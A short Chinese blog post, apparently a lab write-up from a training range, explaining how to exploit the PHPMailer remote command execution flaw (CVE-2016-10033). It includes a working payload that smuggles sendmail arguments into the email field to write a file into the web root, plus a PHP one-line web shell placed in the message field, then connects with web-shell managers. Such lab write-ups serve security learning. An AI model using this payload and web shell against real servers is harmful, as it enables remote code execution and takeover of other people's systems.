当前位置：网站首页>墨者学院-PHPMailer远程命令执行漏洞溯源

墨者学院-PHPMailer远程命令执行漏洞溯源

2022-07-04 07:40:00 【Lyswbb】

拿到靶场之后点击访问

分享一个小工具，用来爬取相关的url Link Gopher

可以看到有用的就一个mail.php

进入之后来到一个邮件测试页面，很明显这里是一个功能点

PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送，无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)

burp抓包，更改email处payload为

"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/1.php @aaa.com

更改message处payload为

<?php @eval($_POST[cmd]);?>

然后访问http://124.70.71.251:44768/1.php,使用蚁剑或者菜刀连接即可

版权声明
本文为[Lyswbb]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_47094508/article/details/125559517